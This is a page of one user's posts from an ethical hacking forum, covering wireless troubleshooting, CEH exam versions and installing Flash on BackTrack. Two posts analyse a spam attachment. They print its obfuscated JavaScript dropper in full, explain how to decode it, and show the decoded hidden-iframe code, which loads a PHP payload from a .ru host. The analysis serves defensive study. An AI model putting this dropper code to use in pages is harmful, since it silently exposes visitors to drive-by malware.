|
EH-Net
|
|
May 23, 2013, 01:22:19 AM
|
 Show Posts
|
|
Pages: 1 ... 4 5 [6] 7 8 ... 126
|
|
76
|
Ethical Hacking Discussions and Related Certifications / Wireless / Re: Requesting help with attack response...
|
on: March 30, 2012, 08:41:54 AM
|
|
Wow, that was a lot to read :-)
First, welcome to EH-Net.
Ironically, I was recently talking to someone that had similar (not quite the same, but similar) issues. They also have an AirPort Extreme and, within the past couple weeks, started having many problems with their wireless connections. My suggest was to reset the device to default factory settings and see if that fixed it (I haven't heard back yet).
Seeing as how that's what you did, and it fixed your first problem, maybe there's something buggy going on with that device.
The 169.* address you're seeing is called an Automatic Private IP Address (APIPA) and is typically assigned when no static or dynamic IP address is available. Usually as is the case when you try to connect two computers directly to each other without configuring network settings.
You can use a tool such as Kismet, Ekahau, or I'm sure there's a utility for iPhone to help you locate the the device broadcasting the old SSID (assuming it's not one of your devices). You can easily get the MAC address and compare to your stuff if you think it is for some reason but it sounds as though you only have the one access point. Or just power down all of your devices except a laptop to see if it's still broadcasting.
You could try and connect to it and see what happens. Maybe it's configured to hand out 169.* IP addresses. If that's the case, you'll see that it connects quickly. If not, it'll take some time, think about it, and then assign the 169.* IP when it can't get one. If it assigns it to you, you could attempt to run Nmap and scan the local range to see if anything replies (may or may not).
I think those would be the first two things to find out, then you can go forward with your other questions. Certainly, if it is someone trying to intercept your communications, if you can't browse to a website or connect to anything, then you can't really pass credentials across. They could, possibly, attack your systems once they are connected though.
Or, it could all just be a bug with your Apple AirPort Express ;-)
Hope that's helpful, it's too early for a long post.
|
|
|
|
|
77
|
Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: C|EH v8?
|
on: March 30, 2012, 08:12:57 AM
|
|
Yeah, I noticed (and replied to) that post as well. I'm not sure where they are getting their information.
I have not heard anything either way. I would think that in order to align with the updated exam, the courseware will have to change. Maybe they'll keep most/all of it and add in parts that need to be included. Maybe they'll scrap it all and rewrite it. I honestly don't know.
If I were to make a guess, it will be (unfortunately) very similar to v7 with some minor changes. At which point, I don't know how that puts your chances for passing the exam. I would have to look through the v7 courseware and see how close it actually is to the new v8 exam.
|
|
|
|
|
79
|
Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Advice - on exam taking
|
on: March 21, 2012, 09:40:03 AM
|
|
The v8 exam was released as a beta at the beginning of the year (actually, may have been towards the end of last year). To my knowledge, it's supposed to be available now (which is what the ANSI accreditation is based on).
The v7 exam will not be retired until January 31, 2013 due to the v8 courseware not being released until this fall (sometime around Hacker Halted). Normally, it's 6 months from the release of the upgraded version of the exam but because the exam has been rolled out before the courseware, an extension has been granted.
|
|
|
|
|
82
|
Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Advice - on exam taking
|
on: March 13, 2012, 09:07:27 AM
|
|
What kind of background do you have? And how did you feel you knew the topics presented in the class?
The new exam (v8) has been changed a bit and was developed to make sure the candidate has the knowledge that should be required of an ethical hacker. This may make it more difficult than previous versions. At the same time, you shouldn't get questions on topics that have nothing to do with the subject, that are too vendor related, or that really don't belong on an ethical hacking exam.
I can't remember when the v7 exam will be retired but I'm sure you have plenty of time to take it, shouldn't have to hurry.
|
|
|
|
|
83
|
Resources / Tools / Re: Backtrack 5 R2
|
on: March 09, 2012, 04:46:25 PM
|
lol... finally figured it out. You have to install the NON 64-bit flash plugin... wget http://fpdownload.macromedia.com/get/flashplayer/pdc/11.1.102.63/install_flash_player_11_linux.i386.tar.gz
tar xvzf install_flash_player_11_linux.i386.tar.gz
mkdir ~/.mozilla/plugins
mv libflashplayer.so ~/.mozilla/plugins/
* current flash version You can then remove the Usr directory that's extracted, you only need the .so file |
|
|
|
|
84
|
Resources / Tools / Re: Backtrack 5 R2
|
on: March 08, 2012, 07:21:43 PM
|
|
Has anyone had success installing flash on the x64 version? I've been through every guide and forum post I've found so far and still no luck.
|
|
|
|
|
88
|
Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / C|EH v8 earns ANSI 17024
|
on: March 07, 2012, 05:15:25 PM
|
It's official, the newest version of C|EH (v8) has earned ANSI accreditation. More information about achieving this milestone is available in the EC-Council Pressroom. Jay Bavisi, Co-Founder and President of EC-Council, added, “We have worked hard for over 2 years to meet the stringent requirements of ANSI 17024 standard. We have scrutinized and challenged every aspect of EC-Council certification activities and operations. This has resulted in significant improvements to both what we do and how we will do it. This benchmark of excellence will give our customers even more confidence in the quality of our certification”.
I can personally vouch that they indeed have worked on this for 2 years. I have been involved with a variety of panels constructing the exam and a lot of work has been put into it. BillV |
|
|
|
|
89
|
Ethical Hacking Discussions and Related Certifications / Programming / Re: Looking for Javascript coder to decode spam HTML attachment
|
on: March 05, 2012, 06:14:42 PM
|
Also, the quick and easy way to decode what you had into what I had... First, we take what you had: <script>aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)
f='-29q-29q67q64q-6q2q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q3q85q-29q-29q-29q67q64q76q59q71q63q76q2q3q21q-29q-29q87q-6q63q70q77q63q-6q85q-29q-29q-29q62q73q61q79q71q63q72q78q8q81q76q67q78q63q2q-4q22q67q64q76q59q71q63q-6q77q76q61q23q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q-6q81q67q62q78q66q23q1q11q10q1q-6q66q63q67q65q66q78q23q1q11q10q1q-6q77q78q83q70q63q23q1q80q67q77q67q60q67q70q67q78q83q20q66q67q62q62q63q72q21q74q73q77q67q78q67q73q72q20q59q60q77q73q70q79q78q63q21q70q63q64q78q20q10q21q78q73q74q20q10q21q1q24q22q9q67q64q76q59q71q63q24q-4q3q21q-29q-29q87q-29q-29q64q79q72q61q78q67q73q72q-6q67q64q76q59q71q63q76q2q3q85q-29q-29q-29q80q59q76q-6q64q-6q23q-6q62q73q61q79q71q63q72q78q8q61q76q63q59q78q63q31q70q63q71q63q72q78q2q1q67q64q76q59q71q63q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q77q76q61q1q6q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q3q21q64q8q77q78q83q70q63q8q80q67q77q67q60q67q70q67q78q83q23q1q66q67q62q62q63q72q1q21q64q8q77q78q83q70q63q8q74q73q77q67q78q67q73q72q23q1q59q60q77q73q70q79q78q63q1q21q64q8q77q78q83q70q63q8q70q63q64q78q23q1q10q1q21q64q8q77q78q83q70q63q8q78q73q74q23q1q10q1q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q81q67q62q78q66q1q6q1q11q10q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q66q63q67q65q66q78q1q6q1q11q10q1q3q21q-29q-29q-29q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q8q59q74q74q63q72q62q29q66q67q70q62q2q64q3q21q-29q-29q87'.split('q');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i>-w.length;i+=1){j=i;s=s+r(38+1*w[j]);}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>
And turn it into something a bit more legible (I've shortened the value of the variable 'f' here to save space): <script>
aa=/\w/.exec(1).index+[];
aaa='0';
try{location({});} catch(hgberger){
if(aa===aaa)
f='-29.split('q');
md='a';
e=eval;
w=f;
s=[];
r=String.fromCharCode;
for(i=0;-i>-w.length;i+=1){
j=i;s=s+r(38+1*w[j]);
}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)
e(s);
}
</script>
A quick glance at the very end tells us to do e(s); and looking up a few lines higher we see e=eval;. So, rather than evaluating s, let's just see what it is by changing the code to document.write(s);: <script>
aa=/\w/.exec(1).index+[];
aaa='0';
try{location({});} catch(hgberger){
if(aa===aaa)
f='-29.split('q');
md='a';
e=eval;
w=f;
s=[];
r=String.fromCharCode;
for(i=0;-i>-w.length;i+=1){
j=i;s=s+r(38+1*w[j]);
}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)
document.write(s);
}
</script>
Throw that into a file, save it as whatever.html, and open in a browser. Then you end up with the code posted previously and can see it's attempting to load that PHP file. It doesn't always work this easily, sometimes you have to dig a little deeper depending on how much of a PITA the author was ;-) ...and obviously it's recommended to do this in some sort of a contained environment (just in case). |
|
|
|
|
90
|
Ethical Hacking Discussions and Related Certifications / Programming / Re: Looking for Javascript coder to decode spam HTML attachment
|
on: March 05, 2012, 06:03:04 PM
|
Wants you to load some php file from a .ru domain hxxp://clkjshdflhhshdf.ru:8080/images/aublbzdni.phpif (document.getElementsByTagName('body')[0]){ iframer(); } else {
document.write(""); } function iframer() {
var f =document.createElement('iframe') f.setAttribute('src','
http://clkjshdflhhshdf.ru:8080/images/aublbzdni.php
');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';
f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f); }
|
|
|
|
|
Loading...
|
Editor-In-Chief : Special Xmas Deal: 10% Off eLearnSecurity Courses
